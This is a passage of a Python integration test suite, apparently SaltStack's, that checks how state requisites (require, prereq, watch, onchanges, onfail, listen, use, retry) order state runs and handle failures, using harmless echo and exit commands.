# TODO: this is actually failing badly
#ret = self.run_function('state.sls', mods='requisites.mixed_complex1')
#result = self.normalize_ret(ret)
#self.assertEqual(expected_result, result)
def test_watch_in(self):
'''
test watch_in requisite when there is a success
'''
ret = self.run_function('state.sls', mods='requisites.watch_in')
changes = 'test_|-return_changes_|-return_changes_|-succeed_with_changes'
watch = 'test_|-watch_states_|-watch_states_|-succeed_without_changes'
self.assertEqual(ret[changes]['__run_num__'], 0)
self.assertEqual(ret[watch]['__run_num__'], 2)
self.assertEqual('Watch statement fired.', ret[watch]['comment'])
self.assertEqual('Something pretended to change',
ret[changes]['changes']['testing']['new'])
def test_watch_in_failure(self):
'''
test watch_in requisite when there is a failure
'''
ret = self.run_function('state.sls', mods='requisites.watch_in_failure')
fail = 'test_|-return_changes_|-return_changes_|-fail_with_changes'
watch = 'test_|-watch_states_|-watch_states_|-succeed_without_changes'
self.assertEqual(False, ret[fail]['result'])
self.assertEqual('One or more requisite failed: requisites.watch_in_failure.return_changes',
ret[watch]['comment'])
def normalize_ret(self, ret):
'''
Normalize the return to the format that we'll use for result checking
'''
result = {}
for item, descr in six.iteritems(ret):
result[item] = {
'__run_num__': descr['__run_num__'],
'comment': descr['comment'],
'result': descr['result'],
'changes': descr['changes'] != {} # whether there where any changes
}
return result
def test_requisites_require_ordering_and_errors(self):
'''
Call sls file containing several require_in and require.
Ensure that some of them are failing and that the order is right.
'''
expected_result = {
'cmd_|-A_|-echo A fifth_|-run': {
'__run_num__': 4,
'comment': 'Command "echo A fifth" run',
'result': True,
'changes': True,
},
'cmd_|-B_|-echo B second_|-run': {
'__run_num__': 1,
'comment': 'Command "echo B second" run',
'result': True,
'changes': True,
},
'cmd_|-C_|-echo C third_|-run': {
'__run_num__': 2,
'comment': 'Command "echo C third" run',
'result': True,
'changes': True,
},
'cmd_|-D_|-echo D first_|-run': {
'__run_num__': 0,
'comment': 'Command "echo D first" run',
'result': True,
'changes': True,
},
'cmd_|-E_|-echo E fourth_|-run': {
'__run_num__': 3,
'comment': 'Command "echo E fourth" run',
'result': True,
'changes': True,
},
'cmd_|-F_|-echo F_|-run': {
'__run_num__': 5,
'comment': 'The following requisites were not found:\n'
+ ' require:\n'
+ ' foobar: A\n',
'result': False,
'changes': False,
},
'cmd_|-G_|-echo G_|-run': {
'__run_num__': 6,
'comment': 'The following requisites were not found:\n'
+ ' require:\n'
+ ' cmd: Z\n',
'result': False,
'changes': False,
},
'cmd_|-H_|-echo H_|-run': {
'__run_num__': 7,
'comment': 'The following requisites were not found:\n'
+ ' require:\n'
+ ' cmd: Z\n',
'result': False,
'changes': False,
}
}
ret = self.run_function('state.sls', mods='requisites.require')
result = self.normalize_ret(ret)
self.assertReturnNonEmptySaltType(ret)
self.assertEqual(expected_result, result)
ret = self.run_function('state.sls', mods='requisites.require_error1')
self.assertEqual(ret, [
"Cannot extend ID 'W' in 'base:requisites.require_error1'. It is not part of the high state.\nThis is likely due to a missing include statement or an incorrectly typed ID.\nEnsure that a state with an ID of 'W' is available\nin environment 'base' and to SLS 'requisites.require_error1'"
])
# issue #8235
# FIXME: Why is require enforcing list syntax while require_in does not?
# And why preventing it?
# Currently this state fails, should return C/B/A
result = {}
ret = self.run_function('state.sls', mods='requisites.require_simple_nolist')
self.assertEqual(ret, [
'The require statement in state \'B\' in SLS '
+ '\'requisites.require_simple_nolist\' needs to be formed as a list'
])
# commented until a fix is made for issue #8772
# TODO: this test actually fails
#ret = self.run_function('state.sls', mods='requisites.require_error2')
#self.assertEqual(ret, [
# 'Cannot extend state foobar for ID A in "base:requisites.require_error2".'
# + ' It is not part of the high state.'
#])
ret = self.run_function('state.sls', mods='requisites.require_recursion_error1')
self.assertEqual(
ret,
['A recursive requisite was found, SLS "requisites.require_recursion_error1" ID "B" ID "A"']
)
def test_requisites_require_any(self):
'''
Call sls file containing several require_in and require.
Ensure that some of them are failing and that the order is right.
'''
expected_result = {
'cmd_|-A_|-echo A_|-run': {
'__run_num__': 3,
'comment': 'Command "echo A" run',
'result': True,
'changes': True,
},
'cmd_|-B_|-echo B_|-run': {
'__run_num__': 0,
'comment': 'Command "echo B" run',
'result': True,
'changes': True,
},
'cmd_|-C_|-/bin/false_|-run': {
'__run_num__': 1,
'comment': 'Command "/bin/false" run',
'result': False,
'changes': True,
},
'cmd_|-D_|-echo D_|-run': {
'__run_num__': 2,
'comment': 'Command "echo D" run',
'result': True,
'changes': True,
},
}
ret = self.run_function('state.sls', mods='requisites.require_any')
result = self.normalize_ret(ret)
self.assertReturnNonEmptySaltType(ret)
self.assertEqual(expected_result, result)
def test_requisites_require_any_fail(self):
'''
Call sls file containing several require_in and require.
Ensure that some of them are failing and that the order is right.
'''
ret = self.run_function('state.sls', mods='requisites.require_any_fail')
result = self.normalize_ret(ret)
self.assertReturnNonEmptySaltType(ret)
self.assertIn('One or more requisite failed',
result['cmd_|-D_|-echo D_|-run']['comment'])
def test_requisites_watch_any(self):
'''
Call sls file containing several require_in and require.
Ensure that some of them are failing and that the order is right.
'''
if salt.utils.platform.is_windows():
cmd_true = 'exit'
cmd_false = 'exit /B 1'
else:
cmd_true = 'true'
cmd_false = 'false'
expected_result = {
'cmd_|-A_|-{0}_|-wait'.format(cmd_true): {
'__run_num__': 4,
'comment': 'Command "{0}" run'.format(cmd_true),
'result': True,
'changes': True,
},
'cmd_|-B_|-{0}_|-run'.format(cmd_true): {
'__run_num__': 0,
'comment': 'Command "{0}" run'.format(cmd_true),
'result': True,
'changes': True,
},
'cmd_|-C_|-{0}_|-run'.format(cmd_false): {
'__run_num__': 1,
'comment': 'Command "{0}" run'.format(cmd_false),
'result': False,
'changes': True,
},
'cmd_|-D_|-{0}_|-run'.format(cmd_true): {
'__run_num__': 2,
'comment': 'Command "{0}" run'.format(cmd_true),
'result': True,
'changes': True,
},
'cmd_|-E_|-{0}_|-wait'.format(cmd_true): {
'__run_num__': 9,
'comment': 'Command "{0}" run'.format(cmd_true),
'result': True,
'changes': True,
},
'cmd_|-F_|-{0}_|-run'.format(cmd_true): {
'__run_num__': 5,
'comment': 'Command "{0}" run'.format(cmd_true),
'result': True,
'changes': True,
},
'cmd_|-G_|-{0}_|-run'.format(cmd_false): {
'__run_num__': 6,
'comment': 'Command "{0}" run'.format(cmd_false),
'result': False,
'changes': True,
},
'cmd_|-H_|-{0}_|-run'.format(cmd_false): {
'__run_num__': 7,
'comment': 'Command "{0}" run'.format(cmd_false),
'result': False,
'changes': True,
},
}
ret = self.run_function('state.sls', mods='requisites.watch_any')
result = self.normalize_ret(ret)
self.assertReturnNonEmptySaltType(ret)
self.assertEqual(expected_result, result)
def test_requisites_watch_any_fail(self):
'''
Call sls file containing several require_in and require.
Ensure that some of them are failing and that the order is right.
'''
ret = self.run_function('state.sls', mods='requisites.watch_any_fail')
result = self.normalize_ret(ret)
self.assertReturnNonEmptySaltType(ret)
self.assertIn('One or more requisite failed',
result['cmd_|-A_|-true_|-wait']['comment'])
def test_requisites_onchanges_any(self):
'''
Call sls file containing several require_in and require.
Ensure that some of them are failing and that the order is right.
'''
expected_result = {
'cmd_|-another_changing_state_|-echo "Changed!"_|-run': {
'__run_num__': 1,
'changes': True,
'comment': 'Command "echo "Changed!"" run',
'result': True
},
'cmd_|-changing_state_|-echo "Changed!"_|-run': {
'__run_num__': 0,
'changes': True,
'comment': 'Command "echo "Changed!"" run',
'result': True
},
'cmd_|-test_one_changing_states_|-echo "Success!"_|-run': {
'__run_num__': 4,
'changes': True,
'comment': 'Command "echo "Success!"" run',
'result': True
},
'cmd_|-test_two_non_changing_states_|-echo "Should not run"_|-run': {
'__run_num__': 5,
'changes': False,
'comment': 'State was not run because none of the onchanges reqs changed',
'result': True
},
'pip_|-another_non_changing_state_|-mock_|-installed': {
'__run_num__': 3,
'changes': False,
'comment': 'Python package mock was already installed\nAll specified packages are already installed',
'result': True
},
'pip_|-non_changing_state_|-mock_|-installed': {
'__run_num__': 2,
'changes': False,
'comment': 'Python package mock was already installed\nAll specified packages are already installed',
'result': True
}
}
ret = self.run_function('state.sls', mods='requisites.onchanges_any')
result = self.normalize_ret(ret)
self.assertReturnNonEmptySaltType(ret)
self.assertEqual(expected_result, result)
def test_requisites_onfail_any(self):
'''
Call sls file containing several require_in and require.
Ensure that some of them are failing and that the order is right.
'''
expected_result = {
'cmd_|-a_|-exit 0_|-run': {
'__run_num__': 0,
'changes': True,
'comment': 'Command "exit 0" run',
'result': True
},
'cmd_|-b_|-exit 1_|-run': {
'__run_num__': 1,
'changes': True,
'comment': 'Command "exit 1" run',
'result': False
},
'cmd_|-c_|-exit 0_|-run': {
'__run_num__': 2,
'changes': True,
'comment': 'Command "exit 0" run',
'result': True
},
'cmd_|-d_|-echo itworked_|-run': {
'__run_num__': 3,
'changes': True,
'comment': 'Command "echo itworked" run',
'result': True},
'cmd_|-e_|-exit 0_|-run': {
'__run_num__': 4,
'changes': True,
'comment': 'Command "exit 0" run',
'result': True
},
'cmd_|-f_|-exit 0_|-run': {
'__run_num__': 5,
'changes': True,
'comment': 'Command "exit 0" run',
'result': True
},
'cmd_|-g_|-exit 0_|-run': {
'__run_num__': 6,
'changes': True,
'comment': 'Command "exit 0" run',
'result': True
},
'cmd_|-h_|-echo itworked_|-run': {
'__run_num__': 7,
'changes': False,
'comment': 'State was not run because onfail req did not change',
'result': True
}
}
ret = self.run_function('state.sls', mods='requisites.onfail_any')
result = self.normalize_ret(ret)
self.assertReturnNonEmptySaltType(ret)
self.assertEqual(expected_result, result)
def test_requisites_full_sls(self):
'''
Teste the sls special command in requisites
'''
expected_result = {
'cmd_|-A_|-echo A_|-run': {
'__run_num__': 2,
'comment': 'Command "echo A" run',
'result': True,
'changes': True},
'cmd_|-B_|-echo B_|-run': {
'__run_num__': 0,
'comment': 'Command "echo B" run',
'result': True,
'changes': True},
'cmd_|-C_|-echo C_|-run': {
'__run_num__': 1,
'comment': 'Command "echo C" run',
'result': True,
'changes': True},
}
ret = self.run_function('state.sls', mods='requisites.fullsls_require')
self.assertReturnNonEmptySaltType(ret)
result = self.normalize_ret(ret)
self.assertEqual(expected_result, result)
# issue #8233: traceback on prereq sls
# TODO: not done
#ret = self.run_function('state.sls', mods='requisites.fullsls_prereq')
#self.assertEqual(['sls command can only be used with require requisite'], ret)
def test_requisites_require_no_state_module(self):
'''
Call sls file containing several require_in and require.
Ensure that some of them are failing and that the order is right.
'''
expected_result = {
'cmd_|-A_|-echo A fifth_|-run': {
'__run_num__': 4,
'comment': 'Command "echo A fifth" run',
'result': True,
'changes': True,
},
'cmd_|-B_|-echo B second_|-run': {
'__run_num__': 1,
'comment': 'Command "echo B second" run',
'result': True,
'changes': True,
},
'cmd_|-C_|-echo C third_|-run': {
'__run_num__': 2,
'comment': 'Command "echo C third" run',
'result': True,
'changes': True,
},
'cmd_|-D_|-echo D first_|-run': {
'__run_num__': 0,
'comment': 'Command "echo D first" run',
'result': True,
'changes': True,
},
'cmd_|-E_|-echo E fourth_|-run': {
'__run_num__': 3,
'comment': 'Command "echo E fourth" run',
'result': True,
'changes': True,
},
'cmd_|-G_|-echo G_|-run': {
'__run_num__': 5,
'comment': 'The following requisites were not found:\n'
+ ' require:\n'
+ ' id: Z\n',
'result': False,
'changes': False,
},
'cmd_|-H_|-echo H_|-run': {
'__run_num__': 6,
'comment': 'The following requisites were not found:\n'
+ ' require:\n'
+ ' id: Z\n',
'result': False,
'changes': False,
}
}
ret = self.run_function('state.sls', mods='requisites.require_no_state_module')
result = self.normalize_ret(ret)
self.assertReturnNonEmptySaltType(ret)
self.assertEqual(expected_result, result)
def test_requisites_prereq_simple_ordering_and_errors(self):
'''
Call sls file containing several prereq_in and prereq.
Ensure that some of them are failing and that the order is right.
'''
expected_result_simple = {
'cmd_|-A_|-echo A third_|-run': {
'__run_num__': 2,
'comment': 'Command "echo A third" run',
'result': True,
'changes': True},
'cmd_|-B_|-echo B first_|-run': {
'__run_num__': 0,
'comment': 'Command "echo B first" run',
'result': True,
'changes': True},
'cmd_|-C_|-echo C second_|-run': {
'__run_num__': 1,
'comment': 'Command "echo C second" run',
'result': True,
'changes': True},
'cmd_|-I_|-echo I_|-run': {
'__run_num__': 3,
'comment': 'The following requisites were not found:\n'
+ ' prereq:\n'
+ ' cmd: Z\n',
'result': False,
'changes': False},
'cmd_|-J_|-echo J_|-run': {
'__run_num__': 4,
'comment': 'The following requisites were not found:\n'
+ ' prereq:\n'
+ ' foobar: A\n',
'result': False,
'changes': False}
}
expected_result_simple_no_state_module = {
'cmd_|-A_|-echo A third_|-run': {
'__run_num__': 2,
'comment': 'Command "echo A third" run',
'result': True,
'changes': True},
'cmd_|-B_|-echo B first_|-run': {
'__run_num__': 0,
'comment': 'Command "echo B first" run',
'result': True,
'changes': True},
'cmd_|-C_|-echo C second_|-run': {
'__run_num__': 1,
'comment': 'Command "echo C second" run',
'result': True,
'changes': True},
'cmd_|-I_|-echo I_|-run': {
'__run_num__': 3,
'comment': 'The following requisites were not found:\n'
+ ' prereq:\n'
+ ' id: Z\n',
'result': False,
'changes': False}
}
expected_result_simple2 = {
'cmd_|-A_|-echo A_|-run': {
'__run_num__': 1,
'comment': 'Command "echo A" run',
'result': True,
'changes': True},
'cmd_|-B_|-echo B_|-run': {
'__run_num__': 2,
'comment': 'Command "echo B" run',
'result': True,
'changes': True},
'cmd_|-C_|-echo C_|-run': {
'__run_num__': 0,
'comment': 'Command "echo C" run',
'result': True,
'changes': True},
'cmd_|-D_|-echo D_|-run': {
'__run_num__': 3,
'comment': 'Command "echo D" run',
'result': True,
'changes': True},
'cmd_|-E_|-echo E_|-run': {
'__run_num__': 4,
'comment': 'Command "echo E" run',
'result': True,
'changes': True}
}
expected_result_simple3 = {
'cmd_|-A_|-echo A first_|-run': {
'__run_num__': 0,
'comment': 'Command "echo A first" run',
'result': True,
'changes': True,
},
'cmd_|-B_|-echo B second_|-run': {
'__run_num__': 1,
'comment': 'Command "echo B second" run',
'result': True,
'changes': True,
},
'cmd_|-C_|-echo C third_|-wait': {
'__run_num__': 2,
'comment': '',
'result': True,
'changes': False,
}
}
expected_result_complex = {
'cmd_|-A_|-echo A fourth_|-run': {
'__run_num__': 3,
'comment': 'Command "echo A fourth" run',
'result': True,
'changes': True},
'cmd_|-B_|-echo B first_|-run': {
'__run_num__': 0,
'comment': 'Command "echo B first" run',
'result': True,
'changes': True},
'cmd_|-C_|-echo C second_|-run': {
'__run_num__': 1,
'comment': 'Command "echo C second" run',
'result': True,
'changes': True},
'cmd_|-D_|-echo D third_|-run': {
'__run_num__': 2,
'comment': 'Command "echo D third" run',
'result': True,
'changes': True},
}
ret = self.run_function('state.sls', mods='requisites.prereq_simple')
self.assertReturnNonEmptySaltType(ret)
result = self.normalize_ret(ret)
self.assertEqual(expected_result_simple, result)
# same test, but not using lists in yaml syntax
# TODO: issue #8235, prereq ignored when not used in list syntax
# Currently fails badly with :
# TypeError encountered executing state.sls: string indices must be integers, not str.
#expected_result_simple.pop('cmd_|-I_|-echo I_|-run')
#expected_result_simple.pop('cmd_|-J_|-echo J_|-run')
#ret = self.run_function('state.sls', mods='requisites.prereq_simple_nolist')
#result = self.normalize_ret(ret)
#self.assertEqual(expected_result_simple, result)
ret = self.run_function('state.sls', mods='requisites.prereq_simple2')
result = self.normalize_ret(ret)
self.assertReturnNonEmptySaltType(ret)
self.assertEqual(expected_result_simple2, result)
ret = self.run_function('state.sls', mods='requisites.prereq_simple3')
result = self.normalize_ret(ret)
self.assertReturnNonEmptySaltType(ret)
self.assertEqual(expected_result_simple3, result)
#ret = self.run_function('state.sls', mods='requisites.prereq_error_nolist')
#self.assertEqual(
# ret,
# ['Cannot extend ID Z in "base:requisites.prereq_error_nolist".'
# + ' It is not part of the high state.']
#)
ret = self.run_function('state.sls', mods='requisites.prereq_compile_error1')
self.assertReturnNonEmptySaltType(ret)
self.assertEqual(
ret['cmd_|-B_|-echo B_|-run']['comment'],
'The following requisites were not found:\n'
+ ' prereq:\n'
+ ' foobar: A\n'
)
ret = self.run_function('state.sls', mods='requisites.prereq_compile_error2')
self.assertReturnNonEmptySaltType(ret)
self.assertEqual(
ret['cmd_|-B_|-echo B_|-run']['comment'],
'The following requisites were not found:\n'
+ ' prereq:\n'
+ ' foobar: C\n'
)
ret = self.run_function('state.sls', mods='requisites.prereq_complex')
result = self.normalize_ret(ret)
self.assertEqual(expected_result_complex, result)
# issue #8210 : prereq recursion undetected
# TODO: this test fails
#ret = self.run_function('state.sls', mods='requisites.prereq_recursion_error')
#self.assertEqual(
# ret,
# ['A recursive requisite was found, SLS "requisites.prereq_recursion_error" ID "B" ID "A"']
#)
ret = self.run_function('state.sls', mods='requisites.prereq_simple_no_state_module')
result = self.normalize_ret(ret)
self.assertEqual(expected_result_simple_no_state_module, result)
def test_infinite_recursion_sls_prereq(self):
ret = self.run_function('state.sls', mods='requisites.prereq_sls_infinite_recursion')
self.assertSaltTrueReturn(ret)
def test_requisites_use(self):
'''
Call sls file containing several use_in and use.
'''
# TODO issue #8235 & #8774 some examples are still commented in the test file
ret = self.run_function('state.sls', mods='requisites.use')
self.assertReturnNonEmptySaltType(ret)
for item, descr in six.iteritems(ret):
self.assertEqual(descr['comment'], 'onlyif condition is false')
# TODO: issue #8802 : use recursions undetected
# issue is closed as use does not actually inherit requisites
# if chain-use is added after #8774 resolution theses tests would maybe become useful
#ret = self.run_function('state.sls', mods='requisites.use_recursion')
#self.assertEqual(ret, [
# 'A recursive requisite was found, SLS "requisites.use_recursion"'
# + ' ID "B" ID "A"'
#])
#ret = self.run_function('state.sls', mods='requisites.use_recursion2')
#self.assertEqual(ret, [
# 'A recursive requisite was found, SLS "requisites.use_recursion2"'
# + ' ID "C" ID "A"'
#])
#ret = self.run_function('state.sls', mods='requisites.use_auto_recursion')
#self.assertEqual(ret, [
# 'A recursive requisite was found, SLS "requisites.use_recursion"'
# + ' ID "A" ID "A"'
#])
def test_requisites_use_no_state_module(self):
'''
Call sls file containing several use_in and use.
'''
ret = self.run_function('state.sls', mods='requisites.use_no_state_module')
self.assertReturnNonEmptySaltType(ret)
for item, descr in six.iteritems(ret):
self.assertEqual(descr['comment'], 'onlyif condition is false')
def test_get_file_from_env_in_top_match(self):
tgt = os.path.join(TMP, 'prod-cheese-file')
try:
ret = self.run_function(
'state.highstate', minion_tgt='sub_minion'
)
self.assertSaltTrueReturn(ret)
self.assertTrue(os.path.isfile(tgt))
with salt.utils.files.fopen(tgt, 'r') as cheese:
data = salt.utils.stringutils.to_unicode(cheese.read())
self.assertIn('Gromit', data)
self.assertIn('Comte', data)
finally:
if os.path.islink(tgt):
os.unlink(tgt)
# onchanges tests
def test_onchanges_requisite(self):
'''
Tests a simple state using the onchanges requisite
'''
# Only run the state once and keep the return data
state_run = self.run_function('state.sls', mods='requisites.onchanges_simple')
# First, test the result of the state run when changes are expected to happen
test_data = state_run['cmd_|-test_changing_state_|-echo "Success!"_|-run']['comment']
expected_result = 'Command "echo "Success!"" run'
self.assertIn(expected_result, test_data)
# Then, test the result of the state run when changes are not expected to happen
test_data = state_run['cmd_|-test_non_changing_state_|-echo "Should not run"_|-run']['comment']
expected_result = 'State was not run because none of the onchanges reqs changed'
self.assertIn(expected_result, test_data)
def test_onchanges_requisite_multiple(self):
'''
Tests a simple state using the onchanges requisite
'''
# Only run the state once and keep the return data
state_run = self.run_function('state.sls',
mods='requisites.onchanges_multiple')
# First, test the result of the state run when two changes are expected to happen
test_data = state_run['cmd_|-test_two_changing_states_|-echo "Success!"_|-run']['comment']
expected_result = 'Command "echo "Success!"" run'
self.assertIn(expected_result, test_data)
# Then, test the result of the state run when two changes are not expected to happen
test_data = state_run['cmd_|-test_two_non_changing_states_|-echo "Should not run"_|-run']['comment']
expected_result = 'State was not run because none of the onchanges reqs changed'
self.assertIn(expected_result, test_data)
# Finally, test the result of the state run when only one of the onchanges requisites changes.
test_data = state_run['cmd_|-test_one_changing_state_|-echo "Success!"_|-run']['comment']
expected_result = 'Command "echo "Success!"" run'
self.assertIn(expected_result, test_data)
def test_onchanges_in_requisite(self):
'''
Tests a simple state using the onchanges_in requisite
'''
# Only run the state once and keep the return data
state_run = self.run_function('state.sls', mods='requisites.onchanges_in_simple')
# First, test the result of the state run of when changes are expected to happen
test_data = state_run['cmd_|-test_changes_expected_|-echo "Success!"_|-run']['comment']
expected_result = 'Command "echo "Success!"" run'
self.assertIn(expected_result, test_data)
# Then, test the result of the state run when changes are not expected to happen
test_data = state_run['cmd_|-test_changes_not_expected_|-echo "Should not run"_|-run']['comment']
expected_result = 'State was not run because none of the onchanges reqs changed'
self.assertIn(expected_result, test_data)
def test_onchanges_requisite_no_state_module(self):
'''
Tests a simple state using the onchanges requisite without state modules
'''
# Only run the state once and keep the return data
state_run = self.run_function('state.sls', mods='requisites.onchanges_simple_no_state_module')
test_data = state_run['cmd_|-test_changing_state_|-echo "Success!"_|-run']['comment']
expected_result = 'Command "echo "Success!"" run'
self.assertIn(expected_result, test_data)
def test_onchanges_requisite_with_duration(self):
'''
Tests a simple state using the onchanges requisite
the state will not run but results will include duration
'''
# Only run the state once and keep the return data
state_run = self.run_function('state.sls', mods='requisites.onchanges_simple')
# Then, test the result of the state run when changes are not expected to happen
# and ensure duration is included in the results
test_data = state_run['cmd_|-test_non_changing_state_|-echo "Should not run"_|-run']
self.assertIn('duration', test_data)
# onfail tests
def test_onfail_requisite(self):
'''
Tests a simple state using the onfail requisite
'''
# Only run the state once and keep the return data
state_run = self.run_function('state.sls', mods='requisites.onfail_simple')
# First, test the result of the state run when a failure is expected to happen
test_data = state_run['cmd_|-test_failing_state_|-echo "Success!"_|-run']['comment']
expected_result = 'Command "echo "Success!"" run'
self.assertIn(expected_result, test_data)
# Then, test the result of the state run when a failure is not expected to happen
test_data = state_run['cmd_|-test_non_failing_state_|-echo "Should not run"_|-run']['comment']
expected_result = 'State was not run because onfail req did not change'
self.assertIn(expected_result, test_data)
def test_multiple_onfail_requisite(self):
'''
test to ensure state is run even if only one
of the onfails fails. This is a test for the issue:
https://github.com/saltstack/salt/issues/22370
'''
state_run = self.run_function('state.sls', mods='requisites.onfail_multiple')
retcode = state_run['cmd_|-c_|-echo itworked_|-run']['changes']['retcode']
self.assertEqual(retcode, 0)
stdout = state_run['cmd_|-c_|-echo itworked_|-run']['changes']['stdout']
self.assertEqual(stdout, 'itworked')
def test_onfail_in_requisite(self):
'''
Tests a simple state using the onfail_in requisite
'''
# Only run the state once and keep the return data
state_run = self.run_function('state.sls', mods='requisites.onfail_in_simple')
# First, test the result of the state run when a failure is expected to happen
test_data = state_run['cmd_|-test_failing_state_|-echo "Success!"_|-run']['comment']
expected_result = 'Command "echo "Success!"" run'
self.assertIn(expected_result, test_data)
# Then, test the result of the state run when a failure is not expected to happen
test_data = state_run['cmd_|-test_non_failing_state_|-echo "Should not run"_|-run']['comment']
expected_result = 'State was not run because onfail req did not change'
self.assertIn(expected_result, test_data)
def test_onfail_requisite_no_state_module(self):
'''
Tests a simple state using the onfail requisite
'''
# Only run the state once and keep the return data
state_run = self.run_function('state.sls', mods='requisites.onfail_simple_no_state_module')
# First, test the result of the state run when a failure is expected to happen
test_data = state_run['cmd_|-test_failing_state_|-echo "Success!"_|-run']['comment']
expected_result = 'Command "echo "Success!"" run'
self.assertIn(expected_result, test_data)
# Then, test the result of the state run when a failure is not expected to happen
test_data = state_run['cmd_|-test_non_failing_state_|-echo "Should not run"_|-run']['comment']
expected_result = 'State was not run because onfail req did not change'
self.assertIn(expected_result, test_data)
def test_onfail_requisite_with_duration(self):
'''
Tests a simple state using the onfail requisite
'''
# Only run the state once and keep the return data
state_run = self.run_function('state.sls', mods='requisites.onfail_simple')
# Then, test the result of the state run when a failure is not expected to happen
test_data = state_run['cmd_|-test_non_failing_state_|-echo "Should not run"_|-run']
self.assertIn('duration', test_data)
def test_multiple_onfail_requisite_with_required(self):
'''
test to ensure multiple states are run
when specified as onfails for a single state.
This is a test for the issue:
https://github.com/saltstack/salt/issues/46552
'''
state_run = self.run_function('state.sls', mods='requisites.onfail_multiple_required')
retcode = state_run['cmd_|-b_|-echo b_|-run']['changes']['retcode']
self.assertEqual(retcode, 0)
retcode = state_run['cmd_|-c_|-echo c_|-run']['changes']['retcode']
self.assertEqual(retcode, 0)
retcode = state_run['cmd_|-d_|-echo d_|-run']['changes']['retcode']
self.assertEqual(retcode, 0)
stdout = state_run['cmd_|-b_|-echo b_|-run']['changes']['stdout']
self.assertEqual(stdout, 'b')
stdout = state_run['cmd_|-c_|-echo c_|-run']['changes']['stdout']
self.assertEqual(stdout, 'c')
stdout = state_run['cmd_|-d_|-echo d_|-run']['changes']['stdout']
self.assertEqual(stdout, 'd')
def test_multiple_onfail_requisite_with_required_no_run(self):
'''
test to ensure multiple states are not run
when specified as onfails for a single state
which fails.
This is a test for the issue:
https://github.com/saltstack/salt/issues/46552
'''
state_run = self.run_function('state.sls', mods='requisites.onfail_multiple_required_no_run')
expected = 'State was not run because onfail req did not change'
stdout = state_run['cmd_|-b_|-echo b_|-run']['comment']
self.assertEqual(stdout, expected)
stdout = state_run['cmd_|-c_|-echo c_|-run']['comment']
self.assertEqual(stdout, expected)
stdout = state_run['cmd_|-d_|-echo d_|-run']['comment']
self.assertEqual(stdout, expected)
# listen tests
def test_listen_requisite(self):
'''
Tests a simple state using the listen requisite
'''
# Only run the state once and keep the return data
state_run = self.run_function('state.sls', mods='requisites.listen_simple')
# First, test the result of the state run when a listener is expected to trigger
listener_state = 'cmd_|-listener_test_listening_change_state_|-echo "Listening State"_|-mod_watch'
self.assertIn(listener_state, state_run)
# Then, test the result of the state run when a listener should not trigger
absent_state = 'cmd_|-listener_test_listening_non_changing_state_|-echo "Only run once"_|-mod_watch'
self.assertNotIn(absent_state, state_run)
def test_listen_in_requisite(self):
'''
Tests a simple state using the listen_in requisite
'''
# Only run the state once and keep the return data
state_run = self.run_function('state.sls', mods='requisites.listen_in_simple')
# First, test the result of the state run when a listener is expected to trigger
listener_state = 'cmd_|-listener_test_listening_change_state_|-echo "Listening State"_|-mod_watch'
self.assertIn(listener_state, state_run)
# Then, test the result of the state run when a listener should not trigger
absent_state = 'cmd_|-listener_test_listening_non_changing_state_|-echo "Only run once"_|-mod_watch'
self.assertNotIn(absent_state, state_run)
def test_listen_in_requisite_resolution(self):
'''
Verify listen_in requisite lookups use ID declaration to check for changes
'''
# Only run the state once and keep the return data
state_run = self.run_function('state.sls', mods='requisites.listen_in_simple')
# Test the result of the state run when a listener is expected to trigger
listener_state = 'cmd_|-listener_test_listen_in_resolution_|-echo "Successful listen_in resolution"_|-mod_watch'
self.assertIn(listener_state, state_run)
def test_listen_requisite_resolution(self):
'''
Verify listen requisite lookups use ID declaration to check for changes
'''
# Only run the state once and keep the return data
state_run = self.run_function('state.sls', mods='requisites.listen_simple')
# Both listeners are expected to trigger
listener_state = 'cmd_|-listener_test_listening_resolution_one_|-echo "Successful listen resolution"_|-mod_watch'
self.assertIn(listener_state, state_run)
listener_state = 'cmd_|-listener_test_listening_resolution_two_|-echo "Successful listen resolution"_|-mod_watch'
self.assertIn(listener_state, state_run)
def test_listen_requisite_no_state_module(self):
'''
Tests a simple state using the listen requisite
'''
# Only run the state once and keep the return data
state_run = self.run_function('state.sls', mods='requisites.listen_simple_no_state_module')
# First, test the result of the state run when a listener is expected to trigger
listener_state = 'cmd_|-listener_test_listening_change_state_|-echo "Listening State"_|-mod_watch'
self.assertIn(listener_state, state_run)
# Then, test the result of the state run when a listener should not trigger
absent_state = 'cmd_|-listener_test_listening_non_changing_state_|-echo "Only run once"_|-mod_watch'
self.assertNotIn(absent_state, state_run)
def test_listen_in_requisite_resolution_names(self):
'''
Verify listen_in requisite lookups use ID declaration to check for changes
and resolves magic names state variable
'''
# Only run the state once and keep the return data
state_run = self.run_function('state.sls', mods='requisites.listen_in_names')
self.assertIn('test_|-listener_service_|-nginx_|-mod_watch', state_run)
self.assertIn('test_|-listener_service_|-crond_|-mod_watch', state_run)
def test_listen_requisite_resolution_names(self):
'''
Verify listen requisite lookups use ID declaration to check for changes
and resolves magic names state variable
'''
# Only run the state once and keep the return data
state_run = self.run_function('state.sls', mods='requisites.listen_names')
self.assertIn('test_|-listener_service_|-nginx_|-mod_watch', state_run)
self.assertIn('test_|-listener_service_|-crond_|-mod_watch', state_run)
def test_issue_30820_requisite_in_match_by_name(self):
'''
This tests the case where a requisite_in matches by name instead of ID
See https://github.com/saltstack/salt/issues/30820 for more info
'''
state_run = self.run_function(
'state.sls',
mods='requisites.requisite_in_match_by_name'
)
bar_state = 'cmd_|-bar state_|-echo bar_|-wait'
self.assertIn(bar_state, state_run)
self.assertEqual(state_run[bar_state]['comment'],
'Command "echo bar" run')
def test_retry_option_defaults(self):
'''
test the retry option on a simple state with defaults
ensure comment is as expected
ensure state duration is greater than default retry_interval (30 seconds)
'''
state_run = self.run_function(
'state.sls',
mods='retry.retry_defaults'
)
retry_state = 'file_|-file_test_|-/path/to/a/non-existent/file.txt_|-exists'
expected_comment = ('Attempt 1: Returned a result of "False", with the following '
'comment: "Specified path /path/to/a/non-existent/file.txt does not exist"\n'
'Specified path /path/to/a/non-existent/file.txt does not exist')
self.assertEqual(state_run[retry_state]['comment'], expected_comment)
self.assertTrue(state_run[retry_state]['duration'] > 30)
self.assertEqual(state_run[retry_state]['result'], False)
def test_retry_option_custom(self):
'''
test the retry option on a simple state with custom retry values
ensure comment is as expected
ensure state duration is greater than custom defined interval * (retries - 1)
'''
state_run = self.run_function(
'state.sls',
mods='retry.retry_custom'
)
retry_state = 'file_|-file_test_|-/path/to/a/non-existent/file.txt_|-exists'
expected_comment = ('Attempt 1: Returned a result of "False", with the following '
